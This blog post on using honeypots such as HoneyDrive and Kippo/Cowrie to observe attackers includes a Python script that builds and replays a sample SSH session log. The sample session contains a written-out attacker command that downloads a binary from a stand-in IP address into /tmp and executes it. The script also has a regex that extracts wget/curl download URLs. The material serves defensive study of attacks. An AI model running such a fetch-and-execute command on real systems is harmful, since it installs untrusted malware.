Sun Tzu said in The Art of War, “… if you know your enemies and know yourself, you will not be imperiled in a hundred battles; if you do not know your enemies but do know yourself, you will win one and lose one; if you do not know your enemies nor yourself, you will be imperiled in every single battle.”
This is great advice from the 6th century BC that is still relevant today. The only thing that has changed is that our battles are fought in cyberspace.
In order to know your enemy you need to see what they are doing so you can be prepared for the upcoming battle. A honeypot gives you the ability to replay the attackers' sessions and see exactly what they typed and what they downloaded to it. That is more immediately relevant than a threat feed from a vendor, because the honeypot shows you a view of the battle happening right outside your door, at the edge of your organization, where a firewall is often the only thing keeping the enemy out.
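As an added example (not code from this post, from HoneyDrive, or from the Kippo/Cowrie projects), the Python below writes a constructed session in the binary TTY-log layout used by Kippo, the SSH honeypot shipped on HoneyDrive, and its successor Cowrie, then replays it and pulls out the commands the attacker typed and the URLs they downloaded from. The record layout `<iLiiLL` and the opcode/direction constants are taken from my recollection of those projects' ttylog.py and are assumptions to verify against your install; the sample session, the hostname and the 198.51.100.7 address are constructed, not a real capture.

```python
"""Write and replay a Kippo/Cowrie-style TTY session log.

Added example, not code from the page or from the Kippo/Cowrie projects.
Assumption: each record is struct '<iLiiLL' (op, tty, length, direction,
sec, usec) followed by `length` bytes of terminal data, as in Kippo/Cowrie's
ttylog.py as I recall it; check against the ttylog.py on your own install.
"""
import re
import struct
from datetime import datetime, timezone

RECORD = "<iLiiLL"
RECORD_SIZE = struct.calcsize(RECORD)
OP_OPEN, OP_CLOSE, OP_WRITE, OP_EXEC = 1, 2, 3, 4      # record opcodes (assumed)
TYPE_INPUT, TYPE_OUTPUT, TYPE_INTERACT = 1, 2, 3         # data direction (assumed)

# Downloads the attacker pulled in via wget/curl; stop the URL at shell separators.
URL_RE = re.compile(rb"(?:wget|curl)\s+(?:-\S+\s+)*(https?://[^\s;|&]+)")


def write_record(buf, op, direction, stamp, data=b""):
    """Append one ttylog record (header + data) to a bytearray."""
    sec = int(stamp)
    usec = int(round((stamp - sec) * 1_000_000))
    buf += struct.pack(RECORD, op, 0, len(data), direction, sec, usec)
    buf += data


def build_sample_session():
    """Constructed sample (not a real capture): an SSH attacker fingerprints
    the box, fetches a binary into /tmp and runs it."""
    buf = bytearray()
    t = 1426300000.0                      # 2015-03-14 02:26:40 UTC
    write_record(buf, OP_OPEN, TYPE_OUTPUT, t)
    exchange = [
        (b"uname -a\r",
         b"Linux svr04 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u1 x86_64 GNU/Linux\r\n"),
        (b"cd /tmp; wget http://198.51.100.7/x86 -O .x; chmod +x .x; ./.x\r",
         b"--2015-03-14 02:26:45--  http://198.51.100.7/x86\r\n"),
        (b"cat /proc/cpuinfo | grep name | wc -l\r", b"1\r\n"),
    ]
    for typed, reply in exchange:
        t += 2.5
        write_record(buf, OP_WRITE, TYPE_INPUT, t, typed)     # what the attacker typed
        t += 0.4
        write_record(buf, OP_WRITE, TYPE_OUTPUT, t, reply)    # what the honeypot answered
    write_record(buf, OP_CLOSE, TYPE_OUTPUT, t + 1)
    return bytes(buf)


def replay(raw):
    """Yield (op, direction, timestamp, data) for every record in a ttylog."""
    off = 0
    while off + RECORD_SIZE <= len(raw):
        op, _tty, length, direction, sec, usec = struct.unpack_from(RECORD, raw, off)
        off += RECORD_SIZE
        data = raw[off:off + length]
        off += length
        yield op, direction, sec + usec / 1_000_000, data


def summarize(raw):
    """Reduce a session to what the attacker typed and what they downloaded."""
    typed = b"".join(d for op, dr, _, d in replay(raw)
                     if op == OP_WRITE and dr == TYPE_INPUT)
    commands = [c.strip().decode("utf-8", "replace")
                for c in typed.split(b"\r") if c.strip()]
    downloads = [u.decode("utf-8", "replace") for u in URL_RE.findall(typed)]
    return {"commands": commands, "downloads": downloads}


def render(raw):
    """Human-readable transcript, one line per record, in the spirit of playlog.py."""
    lines = []
    for op, dr, ts, data in replay(raw):
        when = datetime.fromtimestamp(ts, timezone.utc).strftime("%H:%M:%S.%f")[:-3]
        tag = {OP_OPEN: "OPEN", OP_CLOSE: "CLOSE"}.get(
            op, "IN " if dr == TYPE_INPUT else "OUT")
        lines.append(f"{when} {tag:5} {data.decode('utf-8', 'replace').rstrip()}")
    return "\n".join(lines)


if __name__ == "__main__":
    session = build_sample_session()
    print(render(session))
    print(summarize(session))
```

Run it as-is to see the constructed transcript; point `replay()` at a real `tty/*.log` file from your honeypot to review a live session. The `downloads` list is the part worth feeding into your blocklists or submitting for analysis, since it names the hosts the attacker stages malware on.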
The SANS Institute defines a honeypot as a computer that is configured to be a decoy server to gather information regarding an attacker or intruder into your system. Hackers’ activities are recorded and all files that are downloaded to the honeypot are captured and stored for analysis by the owner of the honeypot.
Think of a honeypot as a computer that has not been patched and has no anti-virus software on it. It is like the "bait car" that police leave on the street with the keys in it, waiting for a thief to steal it, except that in this case it is a virtual computer and there is nothing to steal. The honeypot is the bait the attacker uses to install their own software and try to get into your network. In practice, though, the honeypot is usually not a real computer at all but an emulator that simulates vulnerable services (an SSH server, a web server, file shares) convincingly enough to be attacked, while giving the attacker no real system to do harm with. It is a sandbox, or a trap, in which an attacker or a piece of malware can be observed. One caveat: a honeypot is still a host on your network, so isolate it, restrict its outbound traffic and watch it closely; an emulator can have bugs of its own, and a honeypot built on a real operating system can be fully compromised.
How will honeypots help you with your compliance mandates?
All compliance mandates are intended to protect your organization's intellectual property, customer data, and payment card information. By knowing your enemy you can be aware of their tactics, where they are coming from and where they want to send data to. You might find out that your enemy is your competitor, a foreign state, or even a former employee.
HoneyDrive is a ready-made virtual appliance that bundles several honeypot packages (among them Kippo for SSH and Dionaea for malware collection). It can be downloaded for free from SourceForge and is very easy to set up.
I recently set up a honeypot and it was successfully attacked within one day of being turned on while directly connected to the Internet. Below are some screenshots showing who has been attacking me and from what countries. I was amazed to see where some of the attacks were coming from.